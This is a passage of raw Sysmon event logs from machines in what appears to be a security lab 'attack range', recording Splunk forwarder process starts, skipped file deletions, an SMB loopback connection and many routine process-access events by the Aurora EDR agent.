154100x800000000000000017988Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.497{E5A8D418-E5B2-63C7-2902-00000000B002}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.664{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6696B31368B40B930CEE857B3B433CC,SHA256=659F877F5862170C5725C0604E5B29E49989E8760DDCE6E45BFE7EAB10D2C1D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.586{FE4C2B44-E5B2-63C7-7306-00000000AF02}56166332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000045594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.313{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56432-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000045593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.313{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56432-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 10341000x800000000000000045592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5B2-63C7-7306-00000000AF02}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E5B2-63C7-7306-00000000AF02}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5B2-63C7-7306-00000000AF02}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.424{FE4C2B44-E5B2-63C7-7306-00000000AF02}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:30.033{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=E23E3C5D2E2DBC7802FB1149CDE9C7EF,SHA256=3D7325C8B89C7B32FBF6158BBF0106C94C78D73843749483F9EBEAB1036901C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017987Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.215{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78F90010E2306614F834B53AE778AAA6,SHA256=880174BAC8D841B83D738C9F5252AB509F025DF34B4588D740E983400A75559D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017986Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:30.012{E5A8D418-E5B1-63C7-2802-00000000B002}6082952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.845{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.843{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.840{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.814{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.783{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 